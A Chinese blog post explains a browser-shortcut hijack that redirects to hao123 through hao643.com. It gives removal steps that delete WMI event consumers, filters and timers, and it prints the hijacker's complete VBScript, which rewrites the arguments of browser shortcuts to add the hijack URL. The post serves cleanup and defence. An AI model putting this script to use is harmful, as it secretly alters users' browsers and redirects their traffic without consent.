博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
hao643.com劫持(IE和Chrome等被修改快捷方式跳转到hao123.com)
阅读量:5341 次
发布时间:2019-06-15

本文共 3594 字,大约阅读时间需要 11 分钟。

最近下载了某个软件,安装后IE和Chrome的Startup Page均被重定向到hao123.com。

查看IE和Chrome的配置选型,没发现问题。
后来发现是快捷方式后边多了一串字符串 "http://hao643.com/?r=ggggg&m=d40"
删除后,经过一段时间,还会再次出现。再删再出现。
不亏是百度旗下的干将!

那么怎么清除呢?

网上中文、英文诸多介绍,既有专杀也有通杀,试了几个均不理想。
后来,因缘巧合得到了解决方法,如下:
1.下载并安装WMITools(http://www.pc18.com/soft/15730.html)
2.以管理员身份打开 C:\Program Files (x86)\WMI Tools\wbemeventviewer.exe
3.点击左上角按钮register for events
4.OK--OK
5.第1个下拉菜单有3个选择项:Consumers、Filters、Timers
6.把这3个选择项下的所有实例全部删除(右键菜单,Delete instance)
//注意,根节点无法删除,点开到具体的instance
7.去掉所有浏览器快捷方式的尾巴--涉及浏览器:114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe
8.搞定收工。

参考文章:

http://jingyan.baidu.com/article/0964eca26f47b38285f536c6.html
http://www.cnblogs.com/chenshao/p/6854790.html

具体代码如下:

1 On Error Resume Next: 2 Const link = "http://hao643.com/?r=ggggg&m=d40": 3 Const link360 = "http://hao643.com/?r=ggggg&m=d40&s=3": 4 browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe": 5 lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Admin\Desktop,C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs": 6 browsersArr = split(browsers,","): 7 Set oDic = CreateObject("scripting.dictionary"): 8 For Each browser In browsersArr: 9     oDic.Add LCase(browser), browser:10 Next:11 lnkpathsArr = split(lnkpaths,","):12 Set oFolders = CreateObject("scripting.dictionary"):13 For Each lnkpath In lnkpathsArr:14     oFolders.Add lnkpath, lnkpath:15 Next:16 Set fso = CreateObject("Scripting.Filesystemobject"):17 Set WshShell = CreateObject("Wscript.Shell"):18 For Each oFolder In oFolders:19     If fso.FolderExists(oFolder) Then:20         For Each file In fso.GetFolder(oFolder).Files:21             If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:22                 Set oShellLink = WshShell.CreateShortcut(file.Path):23                 path = oShellLink.TargetPath:24                 name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):25                 If oDic.Exists(LCase(name)) Then:26                     If LCase(name) = LCase("360se.exe") Then:27                         oShellLink.Arguments = link360:28                     Else:29                         oShellLink.Arguments = link:30                     End If:31                     If file.Attributes And 1 Then:32                         file.Attributes = file.Attributes - 1:33                     End If:34                     oShellLink.Save:35                 End If:36             End If:37             Next:38     End If:39 Next:

转载于:https://www.cnblogs.com/kylinming/p/7220192.html

你可能感兴趣的文章
使用iperf测试网络性能
查看>>
struts2入门之准备工作
查看>>
从C语言的弱类型属性说起
查看>>
图片的显示隐藏(两张图片,默认的时候显示第一张,点击的时候显示另一张)...
查看>>
Docker 安装MySQL5.7(三)
查看>>
python 模块 来了 (调包侠 修炼手册一)
查看>>
关于CSS的使用方式
查看>>
本地MongoDB服务开启与连接本地以及远程服务器MongoDB服务
查看>>
跨域解决方案之CORS
查看>>
学习RESTFul架构
查看>>
分析语句执行步骤并对排出耗时比较多的语句
查看>>
原生JS轮播-各种效果的极简实现
查看>>
软件工程总结作业---提问回顾与个人总结
查看>>
计数器方法使用?
查看>>
带你全面了解高级 Java 面试中需要掌握的 JVM 知识点
查看>>
sonar结合jenkins
查看>>
解决VS+QT无法生成moc文件的问题
查看>>
AngularJs练习Demo14自定义服务
查看>>
stat filename
查看>>
关于空想X
查看>>